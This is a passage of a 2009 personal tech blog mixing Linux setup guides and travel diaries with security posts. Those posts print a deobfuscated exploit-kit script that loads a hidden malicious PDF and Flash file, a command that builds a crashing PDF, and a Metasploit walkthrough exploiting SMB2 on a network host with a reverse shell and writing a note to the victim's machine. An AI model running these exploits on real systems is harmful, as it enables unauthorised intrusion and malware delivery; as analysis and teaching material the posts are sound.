Sunday, November 15, 2009

Javascript lastmodified technique

Today I’ve found a website that told to have fragus botnet exploit kit.

After reviewing the page source code, it turns out to be using ‘lastmodified’ technique to make deobfuscation process harder. (Read here)

var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...


By checking the HTTP Header request, we can replace the Last Modified Date into the variable for further analysis.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Content-Type: text/html; charset=WINDOWS-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT

Replace the variable with the value of Last Modified Date and edit it to make spidermonkey js interpret the output;

window = print;
document = print;
var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp="Fri, 12 Dec 2008 11:11:35 GMT",
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...
...
...
print(ajkq);
};

bcfknv();

And now we are ready to decode the JavaScript with spidermonkey js interpreter. Below are the output;
function cfmqsy(){}

function jloqy(){
var ijqstv=false;
if(navigator.plugins && navigator.plugins.length){
for(var bfntv=0;bfntv < navigator.plugins.length;bfntv++){
if(navigator.plugins[bfntv].description.indexOf('Adobe Acrobat')!=-1){
ijqstv=true;
break;
}

if(navigator.plugins[bfntv].description.indexOf('Adobe PDF')!=-1){
ijqstv=true;
break;
}
}
}

else if(window.ActiveXObject){
var kyzvnb=null;

try{
kyzvnb=new ActiveXObject('AcroPDF.PDF');
} catch(e){}

if(!kyzvnb){
try{
kyzvnb=new ActiveXObject('PDF.PdfCtrl');
}
catch(e){}
}

if(kyzvnb){ijqstv=true;}
}

if(ijqstv){
var ua=navigator.userAgent.toLowerCase();
if(ua.indexOf("firefox")!=-1){
var fjwx=document.createElement('embed');
fjwx.width='1';
fjwx.height='1';
fjwx.src='./egilrw.pdf';
fjwx.type='application/pdf';
document.body.appendChild(fjwx);
}
else{
var fjwx=document.createElement('iframe');
fjwx.setAttribute('src','. < strong>/egilrw.pdf < /strong>');
fjwx.setAttribute('width',10);
fjwx.setAttribute('height',10);
fjwx.setAttribute('style','display:none;');
document.body.appendChild(fjwx);
}

...
...
...

function opvy(){
var PlayerVersion=[0,0,0];
if(navigator.plugins && navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];

if(x && x.description){
PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");
}
}

else{
try{
var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if(fv!=null){
PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
}
} catch(e){abhmry();return;
}
}

var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;
var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;
var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;

if(version1==9 && version3 < 124){
var ua=navigator.userAgent.toLowerCase();

if(ua.indexOf("firefox")!=-1){
var swfelement=document.createElement('embed');
document.body.appendChild(swfelement);
swfelement.width='1';
swfelement.height='1';
swfelement.src='. < strong>/manual.swf < /strong>';
swfelement.type='application/x-shockwave-flash';

...
...
...

}

jloqy();

From the code, we can identify that it tries to attack the vulnerabilities of Adobe Reader and Flash.

Downloaded the malicious PDF file that they’ll push when user visit the site. Gonna take a look at it later.

Saturday, November 14, 2009

Analyzing malicious PDF

Maybe some of you have read about malicious PDF and its danger if we neglect the possibility that it can harm you in some ways.

So today, let say you have caught some suspicious pdf file in wild and you don’t really know what to do.



The first and following questions might arise, “Does it contains malicious content?” and if yes, “What it’ll try to do and how?”.
Now the first thing that we normally do is to look into the PDF content structure and check for any hints. PDF do have a structure to form as a PDF Document. As in this case, we’re going to use the ‘cat’.



Alright, everything seems normal except the unreadable content between ’stream’ and ‘endstream’. We cannot determine whether this unreadable content is a malicious content or just a usual content for PDF document. However, we know that the unreadable content is encoded with FlateDecode as we search through the keyword ‘/Filter’. Most of normal PDF file usually have some of its content encoded with FlateDecode, and other encodings to name like JBIG2Decode and DCTDecode. FlateDecode usually can be decoded by using pdf-parser or inflater.



It turns out that the decoded content is a JavaScript code that is obfuscated with Base64 encoding. Until this part, PDF file has drawn some attention as it show some signs that the code might contains shellcode. Now we’ll dump the snippet JavaScript code into new text file for further analysis.

Next, we’ll use spidermonkey to interprete the JavaScript code and generate the output shellcode.



As we gone this far, we can surely identify that this PDF contains malicious content, and we also can identify what it try to do and how. From this shellcode, we can see that it try to exploit the vulnerability of util.printf (CVE-2008-2992) of Adobe Reader 8.1.2 and below. If succeeded, it will execute the payload attached within unescape() function.

Our next (and might be the last) attention is the payload itself. It is a UTF16/UCS2 character which can be converted to hex or into bin executable file. s2b.py can do the job for that.



From the hexdump output, we’re able to see that there is a URL of potential malware that will be triggered when the exploitation succeeded.

Friday, October 16, 2009

Updating Firefox 3.5 Flash Player in Ubuntu

This is just for my future reference in case I forgot about it again.

I try to view the dashboard in Snorby demo page. Sadly, the wonderful graph did not show up. I check for my flash plugin, it is a default installation of version 9.0. So I decided to check for the latest version at Adobe site and it is already version 10.0.32.18.

So I download the Adobe Flash .deb package and install
sudo dpkg -i install_flash_player_10_linux.deb

I restart my Firefox, and still it detect my Shockwave Flash as version 9.
So here are trick for it;
sudo mv /usr/lib/swfdec-mozilla/libswfdecmozilla.so /usr/lib/swfdec-mozilla/libswfdecmozilla.old
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/swfdec-mozilla/libswfdecmozilla.so
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/firefox/plugins/

Restart your Firefox, and check about:plugins

Wednesday, October 14, 2009

PDF Structure + embedded JavaScript

Since recently, I’ve been studying about PDF structure and how it can be a platform to distribute and infect malware to user. All I can say, it is made possible through vulnerability in handling JavaScript. As my friend quoted from Didiers Stevens statement, “PDF + JS = OMG”.

Actually Didiers Stevens has come out with a tool that allows you to create a PDF file and embed JavaScript code into the file. It is a nice tool which allow us to learn about the structure of PDF file and how JavaScript code is embedded into it. Have a look it in here.

Example PDF file that’ll crash Adobe Reader 8.1.2 on XP SP2
$ python make-pdf-javascript.py -j “util.printf(’%5000f’, 0.0);” donotopen.pdf



From here, with a complete JavaScript code to do heapspray and execute shellcode, the PDF file is ready to get to the user and infect the computer.

GNU Screen rawks!

I’ve always heard about screen before but never had an interest to read about and try. Up until recently, a friend of mine use it and it got my attention on how he manage his terminal with screen.

For a person who work a lot with the terminal-based system, screen can be quite handy application for me to work with. With one terminal emulator and run screen on it, I can edit a code, run irc, connect to ssh, reading a log and etc. I can detach and reattach the screen. If i accidentally close the terminal emulator, all I need to do is open it back and resume my previously-closed screen with the same state.


To start getting to know screen (for those who never installed it yet), run this command:
sudo apt-get install screen
and
man screen

Other reference you might want to look at:

http://www.kuro5hin.org/story/2004/3/9/16838/14935
http://jmcpherson.org/screen.html
http://aperiodic.net/screen/

Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I’ve downloaded the metasploit framework 3.3 and tested the new unpatched smb2 exploit in my local network ;-D.

Run the metasploit framework console
[email protected] $ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result!. Now check for the Windows version from the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit to that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That’ll give me a full control to the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

It is quite a dangerous situation where people are able to get into your computer without you knowing about it. And to get worst, they can get your personal files/folder or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old town, or Lab), the recommended solution for the time being is to disable your SMB2. You can get the Microsoft’s released of disabling SMB2 here.

Be not an ignorant or you’ll be in trouble.

Thursday, October 1, 2009

Accessing MySQL database from outside localhost

When I installed or use certain application that needed a MySQL database, mostly it will be accessing from a localhost. For example like the Apache Server and etc. It is much more convenient and easy to configure.

However, as my project require to have a dedicated centralize database server, and the application is reside in other server, so I have to configure the application and MySQL to allow connection from outside localhost. As we all know, by default, MySQL only allow connection or access from within the localhost.

So here’s the solution for this case,

edit your /etc/mysql/my.cnf and change the bind address:
$ sudo vim /etc/mysql/my.cnf

find the word ‘bind-address’ and change 127.0.0.1 to your IP.

Then login to the mysql console:
$ mysql -uroot -pYOURROOTPASSWORD
mysql> GRANT ALL PRIVILEGES ON *.* TO [email protected] IDENTIFIED BY “PASSWORD”;
mysql> FLUSH PRIVILEGES;
mysql> exit
Now you can access your database from outside localhost:
$ mysql -uUSERNAME -pPASSWORD -h MYSQL_SERVER_IP

Wednesday, September 30, 2009

Exploit published for SMB2 vulnerability in Windows

Good news! (i guess), the fully functional exploit code for the (still unpatched) Windows SMB v2 vulnerability has been published to the public via metasploit framework. It can be used to discover and attack vulnerable Windows machines remotely.

You can read more at here, here and here

Wednesday, September 9, 2009

Keyboard layout problem in VMware Server 2

Recently I’ve installed VMware Server 2 which are needed for some of my projects. I was very excited and look forward to install OS in it. However, on my first OS installation, I noticed that the keyboard layout was wrong. I have no choice but to abort the installation and find the solution for that problem.

After doing several searching, I found out that I need to add something in the vmware configuration file.

For my future reference, here are the solution;
$ sudo vim /etc/vmware/config

and add this line into the config file;
xkeymap.nokeycodeMap = “TRUE”

save, exit, and your done.

NOTE: You cannot pipe the echo command to the /etc/vmware/config with sudo, as you’ll end up getting the Permission denied, unless you can change to root and pipe the echo command. For example;
$ sudo su
$ echo -e “xkeymap.nokeycodeMap = \”TRUE\”" >> /etc/vmware/config
$ exit

Friday, September 4, 2009

Install VMware Server 2 dalam Linux

Hari ni aku nak berkongsi cara-cara nak menginstall VMware Server 2 kat dalam Ubuntu 9.04 (Sebagai rujukan masa depan, kot2 aku terlupa cara nak install nanti).

Sebelum kita mula aktiviti menginstall VMware Server 2 ni, eloklah kita download dulu installation tarball dlu. Anda boleh download tarball VMware Server 2 tu kat http://www.vmware.com/products/server/.

Di laman web vmware tu, klik “Download” dan daftarkan akaun anda. Setelah selesai mendaftar, anda akan didirectkan ke laman download. Klik pada “TAR image” untuk VMware Server 2 for Linux Operating Systems dan download.

Semasa tengah download, sila check email anda untuk aktivate kan akaun anda. Ini adalah untuk mendapatkan lesen produk yang akan digunakan semasa installasi nanti.

Setelah selesai download dan aktivasi lesen, install aplikasi yang diperlukan sebelum nak install VMware Server 2:
$ sudo apt-get install linux-headers-`uname -r` build-essential xinetd

Kemudian pergi ke directory tarball yang anda download tadi (dalam kes saya, /home/azizan), ekstrak dan install pakej vmware tersebut:
$ cd /home/azizan

$ tar xvfz VMware-server-*.tar.gz

$ cd vmware-server-distrib

$ sudo ./vmware-install.pl

Semasa installasi, anda akan ditanya beberapa soalan, jika anda musykil untuk menjawab, anda hanya perlu tekan Enter (default answer), kecuali apabila ditanya berkenaan nama atau alternate administrator. Isikan username anda. Untuk direktori menyimpan Virtual Machine, anda boleh menggunakan direktori home anda (dalam kes saya, /home/azizan/vm).

Setelah hampir selesai, anda akan diminta untuk mengisi Serial Number untuk VMware Server 2. Isikan Serial Number yang anda dapat ketika aktivasi akaun anda tadi.

Sesudah selesai installasi VMware Server 2, anda bolehlah menggunakan VMware Server 2 anda melalui web browser kegemaran anda dengan memasuki alamat berikut:
http://localhost:8222

Selamat mencuba!

Saturday, August 29, 2009

Apache.org hit by SSH key compromise

The open-source Apache Software Foundation pulled its Apache.org Web site offline for about three hours today because of server hack caused by a compromised SSH key.

A brief message posted on the site made it clear the compromise was “not due to any software exploits in Apache itself”, but was actually caused by a compromised SSH key.

See the initial report from Apache.

Source: ZDnet

Monday, August 17, 2009

Belajar guna SVN

Dulu masa berjinak2 guna FreeBSD, aku disuruh belajar update ports guna CVSup. Lepas tu sekarang aku disuruh belajar pasal SVN. Rupe2nye bendalah ni purpose dia lebih kurang sama je, cuma fungsi dan kemampuan yang berlainan. CVSup, SVN, git ni duduk dalam satu kategori iaitu SCM atau Source Control Management.

Bendalah2 ni akan synchronize kan source2 application yang ada dalam directory kita dengan yang ada kat server developer. Kalau untuk development, dia akan synchronizekan source2 yang kita develop kat local dengan server punya source (sebagai kemaskini, atau dalam bahasa lain, revision).

Bagi sape2 yang nak berjinak dengan SVN dan nak tau fungsi, keupayaan, dan syntax SVN ni, bleh la rajin2kan diri baca kat sini

Saturday, August 15, 2009

Redmine and SVN installation/configuration

Install all packages needed for redmine and svn:
$ sudo aptitude install ruby rubygems ruby1.8-dev libgemplugin-ruby libgemplugin-ruby1.8 \
mysql-server libruby-extras libruby1.8-extras rubygems1.8 rails \
subversion rake apache2-threaded-dev apache2 libapache-dbi-perl \
libapache2-mod-perl2 libdigest-sha1-perl libapache2-svn libdbd-mysql-perl
Install and configure redmine (version 0.8.4 as this tutorial took place, please refer to http://rubyforge.org/frs/?group_id=1850 for latest version):
$ mkdir /var/www/redmine
$ cd /var/www/redmine
$ sudo wget http://rubyforge.org/frs/download.php/56909/redmine-0.8.4.tar.gz
$ sudo tar xvfz redmine-0.8.4.tar.gz
$ sudo mv redmine-0.8.4/* .;rm redmine-0.8.4.tar.gz -rf
$ sudo rm -rf redmine-0.8.4/
$ sudo chown www-data:www-data * . -R
Create MySQL database for redmine:
$ sudo mysql -uroot -p
mysql> create database redmine character set utf8;
Copy and edit file database.yml
$ sudo cp config/database.yml.example config/database.yml
$ sudo nano config/database.yml

EDIT:

production:
adapter: mysql
database: redmine
host: 127.0.0.1
username: your-mysql-username
password: your-mysql-password
encoding: utf8

Run the rake command for “production” setting:
$ sudo rake db:migrate RAILS_ENV=”production”
$ sudo rake redmine:load_default_data RAILS_ENV=”production”

Install passenger (aka mod_rails):
$ gem install passenger (It’ll take a while)
$ sudo /var/lib/gems/1.8/gems/passenger-2.2.4/bin/passenger-install-apache2-module

Create/Open and add the ‘LoadModule’ in /etc/apache2/mods-available/passenger.load:
$ sudo nano /etc/apache2/mods-available/passenger.load
LoadModule passenger_module /var/lib/gems/1.8/gems/passenger-2.2.4/ext/apache2/mod_passenger.so

Create/Open and add new module in /etc/apache2/mods-available/passenger.conf:
$ sudo nano /etc/apache2/mods-available/passenger.conf
PassengerRoot /var/lib/gems/1.8/gems/passenger-2.2.4
PassengerRuby /usr/bin/ruby1.8

Enable the passenger for apache module:
$ sudo a2enmod passenger

Copy the Redmine.pm file into the apache perl5 library:
$ sudo cp /var/www/redmine/extra/svn/Redmine.pm /usr/lib/perl5/Apache

Create and add the following in /etc/apache2/sites-available/redmine (you might need to change the bold text):
$ sudo nano /etc/apache2/sites-available/redmine
NameVirtualHost *

ServerName redmine.yourURL
DocumentRoot /var/www/redmine/public
ServerAdmin [email protected]
LogLevel warn
ErrorLog /var/log/apache2/redmine_error
CustomLog /var/log/apache2/redmine_access combined

Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all


Create and add the following in /etc/apache2/sites-available/svn (you might need to change the bold text):
$ sudo nano /etc/apache2/sites-available/svn
NameVirtualHost *
PerlLoadModule Apache::Redmine

ServerName svn.yourURL
ServerAdmin [email protected]
ErrorLog /var/log/apache2/svn_error
CustomLog /var/log/apache2/svn_access combined


DAV svn
SVNParentPath “/var/svn/”

AuthType Basic
AuthName redmine
Require valid-user

PerlAccessHandler Apache::Authn::Redmine::access_handler
PerlAuthenHandler Apache::Authn::Redmine::authen_handler

RedmineDSN DBI:mysql:database=redmine;host=localhost

RedmineDbUser mysql-user
RedmineDbPass mysql-password


Restart the Apache Server:
$ sudo /etc/init.d/apache2 restart

Create svn root repository directory and set the permission:
$ sudo mkdir /var/svn
$ sudo chmod 0755 /var/svn

Configure Apache to serve the svn repositories through DAV:
$ sudo a2enmod dav
$ sudo a2enmod dav_svn
$ sudo a2enmod perl
$ sudo a2ensite svn
$ sudo /etc/init.d/apache2 reload

Edit the Apache sites-enabled:
$ cd /etc/apache2/sites-enabled
$ sudo rm 000-defaults
$ sudo ln -s ../sites-available/redmine 000-redmine
$ sudo /etc/init.d/apache2 reload

Now lets get the redmine server up:
$ sudo ruby /var/www/redmine/script/server -e production

Done!, now you can go to the redmine page through this address
http://redmine:3000/

NOTE: You can put the repository creation script into the cron job for schedule checking to make sure the Redmine project and create repositories accordingly.
$ sudo nano /etc/cron.d/redmine

and put this line into it
10 * * * * root ruby /var/www/redmine/extra/svn/reposman.rb –redmine redmine.yourURL –svn-dir /var/svn –owner www-data –url http://svn.yourURL/ >> /var/log/reposman.log” > /etc/cron.d/redmine

References:
  1. http://lordsauron.wordpress.com/2008/12/10/redmine-08x-installation-tutorial/
  2. http://wiki.ousli.org/index.php/RedmineUbuntu
  3. http://blog.itsmine.co.uk/2009/01/22/howto-install-subversion-and-redmine-on-centos5-rhel5/

Thursday, July 30, 2009

Python: Sort List and return Index of original Unsorted Item

I’ve been staying up all night to revise my research paper which will going to be submitted as a final submission for IEEE Symposium on Industrial Electronics and Applications (ISIEA 09).

Most of the night was spent by working with the python code to make a comparison based on the test data and training data-set to be included as a result findings in the paper.

One problem occurs when I want to sort the array list of the result data but still want to keep the original unsorted index for future reference. The searching and asking process took place and several solutions to this problem found.
  1. build a mapping from values to the original index before sorting the list
  2. build a list of (value, pairs) pairs and sort that list instead of the original array list
  3. don’t sort at all, just sort a copy
  4. sorted(enumerate(arrayname), key=operator.itemgetter(1))
and definitely I choose the 4th solutions, which is not much working need to be done.

Below are the steps and output,
>> myarray = [2, 3, 1, 4, 5]
>> import operator
>> sorted(enumerate(myarray), key=operator.itemgetter(1))
[(2, 1), (0, 2), (1, 3), (3, 4), (4, 5)]

Saturday, June 20, 2009

Ke Bagan Datoh

Baru-baru ni aku dan sahabat2 telah ke Bagan Datoh, Perak, atas hajat untuk melawat sebuah masjid yang telah dibina hampir 150 tahun.

Tujuan lawatan ini adalah untuk melihat dan mengkaji warisan dan seni bina yang ditinggalkan oleh ulama-ulama nusantara dahulu, yang mana, setiap ukiran, struktur, dan rekabentuk masjid itu mempunyai maksud yang tersirat serta nilai-nilai ketuhanan yang sangat mendalam. Berdasarkan apa yang kami lihat, sebahagian besar struktur dalaman masjid ini masih kekal dengan binaan asalnya, seperti tiang-tiang seri, siling, serta dibahagian mimbar masjid. Ukiran kayu yang melafazkan selawat keatas Nabi masih jelas kelihatan di bahagian mimbar serta corak-corak bersifat nusantara yang melambangkan kreativiti masyarakat melayu dahulu kala.



Sekiranya mendongak ke siling masjid, terlihat keunikan struktur siling yang membentuk tingkatan segi empat dialun dengan ukiran khat disekelilingnya yang memberikan sebuah perasaan pelik tetapi tenang, mungkin juga ia disebabkan cahaya yang diimbas kepada kepingan-kepingan kaca disekeliling siling tersebut.

Secara keseluruhan, pengalaman beriktikaf dimasjid tersebut memberi sebuah perasaan yang amat menenangkan, disamping suasana kampung yang mendamaikan, jauh dari nuansa keangkuhan dan kebuasan manusia sejagat. Namun, bagi aku yang masih seperti bocah kecil, semua maksud dan nilai yang tersirat disetiap sudut masjid itu masih belum dalam diertikan satu persatu. Hanya dapat aku menghayati ketenangan dan kedamaian yang menyelubungi masjid itu.

Saturday, May 2, 2009

Two unforgettable weeks in Indonesia

Today, my friends and I have arrived in Malaysia after travelling to Indonesia for 2 weeks. It is a journey that gives me so many great experience in terms of religion, culture, lifestyle, and others.

Our journey mission is to visit every tomb of Wali Songo, Mosques and other historical places in order to learn and study about the spread of Islam in the Nusantara region. The journey starts from Bandung where our host, Kak Ain managed to get us accommodated around Universitat Padjadjaran and for us to settle down and strategize our travel plan. From there, we head to Cirebon and Demak to visit Keraton Kasepohan, Makam Sunan Gunung Jati, Makam Sunan Kali Jaga and Masjid Agung Demak. My impression towards those places is unexplainable. I've never seen such places with unique islamic structure, scenery and so full of culturish environment.

Along the journey, we also visit Makam Sunan Kudus Sunan Ampel, Sunan Drajat all the way to Surabaya. We continue our journey to Yogyakarta to visit Balai Kajian dan Pengembangan Budaya Melayu (BKPBM). In BKPBM, we got a warmth welcome by all of the editors there, and managed to get a deep discussion and knowledge sharing about malay culture and civilization from their research and perspective as well as ours, (read more about this here). Our cultural and historical trip ends there and we wrap our night in Yogyakarta with some food-searching and sight-seeing around Kota Malioboro.



From Yogyakarta, we head back to Bandung with such a unforgettable memories that we've picked along the way of our journey. To think back, apart of the journey adventure to explore the Java land, I really appreciate the knowledge and experience I’ve learned so much from each and every places I’ve visited, from its language and dialect, culture and lifestyle, and also its food. It has opened my eyes to the new perspective of Malay history and civilization.

Saturday, April 18, 2009

Wrapping up the FYP

It is a full relief. After 3.5 months of aggressive usage of mind, My partner and I have presented our FYP project yesterday. It was a nervous plus confidence mixture feeling. The 3.5 months work evaluated in around 30 minutes.

To be frank, the presentation was not going as good as I expected. I stumble a lot, forgot some points and yada yada. But in general, we are fully satisfied with the overall experience and skills that we get from the project. A lot of new knowledge that we’ve learned within those period, not to forget some memories during detection and data collection process.



At the time we proposed the project, we didn't know whether we can get this thing to work, but in the end, we managed to see it function as we programmed it to be. k-Nearest Neighbor rocks!

As to wrap up this Final Year Project, I would like to express my deepest appreciation towards persons listed below:
  • My Family
  • My Supervisor, Dr. Teddy Mantoro
  • My Partner, Salahudin
  • My Friends, you know who you are =)
Thank you, without you all, I might not be able to complete my project.

Wednesday, February 25, 2009

Mechanism to measure WiFi signals

For my Final Year Project progress, I need to measure the signals produced from the Wi-Fi access points in Kulliyyah of ICT.

In Wi-Fi access points, there is three (3) signals that can be measure and take into account for my FYP research, which are (a) Signal Strength, (b) Signal Quality, and (c) Signal Noise. The things that matter right now is the mechanism to measure those signals and save it as the experiment data.

After several moment of research, I found out that Linux has an application that can scan the signal strength, quality and noise from the access points, which called iwlist.

This application (iwlist) scans and retrieve the information of the access points like the MAC Address, Signal Strength, Signal Quality, Signal Noise and etc. What actually matters to my project are the Signal Strength, Signal Quality, Signal Noise of the access points.

From here, I then manipulated the source code of built-in iwlist in Linux and make it smaller and standalone. Next, I develop another script that integrate with iwlist to manipulate the output and save the information in a database-like form for later retrieval and calculation.

Might need several days to finish developing those measurement mechanism. hmmm.

Friday, February 20, 2009

Final Year Project progress

Tracking Indoor Symbolic Location Using IEEE 802.11 Signals in Location-Aware Computing, it is a topic that me and my partner have choosen to work on for our final year project.

Our supervisor, who is specialized in this area (pervasive and ubiquitous computing) has guided us to select this topic and giving a tremendous inspiration to us about its future development.

So, back to the project topic, what does this project is all about? Basically, we will going to conduct a study and develop a system which will determine user location based on Wi-Fi signals.


Several access points on a corridor with different points will generate a unique signals. Thus, from this uniqueness, the user location can be determine. Based on the diagram above, we can see that there are 3 access points on a corridor, and 4 points of location where the user might be standing. So, for every point 1, 2, 3, and 4, the signal strength of 3 access points will be different. Below can represent a mock data;

Point 1
  • Signal strength AP1: -20
  • Signal strength AP2: -65
  • Signal strength AP3: -83

Point 2
  • Signal strength AP1: -45
  • Signal strength AP2: -32
  • Signal strength AP3: -69

Point 3
  • Signal strength AP1: -89
  • Signal strength AP2: -57
  • Signal strength AP3: -36

Point 4
  • Signal strength AP1: -93
  • Signal strength AP2: -67
  • Signal strength AP3: -21

Basically, we need to develop an application to scan the signal strength of all existing access points on the corridor and make it as training data-set and also an application to validate the data-set collected.

But, before that, we might need to do something with our first project report since the due date has reached its end :\ . Be back soon with other progress

Monday, February 16, 2009

Configure Ubuntu 8.10 with IIUM Wireless (ARUBA)

As for my experience when the IIUM Wireless Environment has implemented, Ubuntu 8.10 (Intrepid Ibex) has a problem to connect to to the wireless network. One of the millions way to fix this problem is by downgrade the version of Network Manager to the previous version. This is the method that I use to enable me to connect to the wireless network. If you have much easier solution to fix this problem, you are welcome to share with us.
Lets get our hand dirty:

1. Open terminal

2. Kill related process
$sudo killall NetworkManager
$sudo killall nm-applet

3. remove network-manager application
$ sudo apt-get remove network-manager

Reading package lists… Done
Building dependency tree
Reading state information… Done
The following packages were automatically installed and are no longer required:
linux-headers-2.6.27-7 linux-headers-2.6.27-7-generic
Use ‘apt-get autoremove’ to remove them.
The following packages will be REMOVED:
network-manager network-manager-gnome
0 upgraded, 0 newly installed, 2 to remove and 0 not upgraded.
After this operation, 4764kB disk space will be freed.
Do you want to continue [Y/n]? y
(Reading database … 129296 files and directories currently installed.)
Removing network-manager-gnome …
Removing network-manager …
* Stopping NetworkManager… [ OK ]
Removing any system startup links for /etc/init.d/NetworkManager …
/etc/rc2.d/S28NetworkManager
/etc/rc3.d/S28NetworkManager
/etc/rc4.d/S28NetworkManager
/etc/rc5.d/S28NetworkManager
Processing triggers for man-db …
Processing triggers for libc6 …
ldconfig deferred processing now taking place

——done—–

4. Download this 6 packages.
  • dhcdbd_3.0-1ubuntu1_i386.deb
http://packages.ubuntu.com/hardy/i386/dhcdbd/download

  • gnome-system-tools_2.22.0-0ubuntu9_i386.deb
http://ubuntu.interlegis.gov.br/ubuntu/pool/main/g/gnome-system-tools/

  • libnm-glib0_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/libnm-glib0/download

  • libnm-util0_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/libnm-util0/download

  • network-manager_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/network-manager/download

  • network-manager-gnome_0.6.6-0ubuntu3_i386.deb
http://packages.ubuntu.com/hardy/i386/network-manager-gnome/download

5. Install the packages that we have download (there are serveral way to install all the packages and in this tutorial we are going to use “dpkg”
$ cd /to/folder/you/save/the/packages
$ sudo dpkg -i *.deb

6. Lastly lock all the 6 packages version that we have downgrade to avoide this 6 packages been upgrade to the newer version when we do system update in future.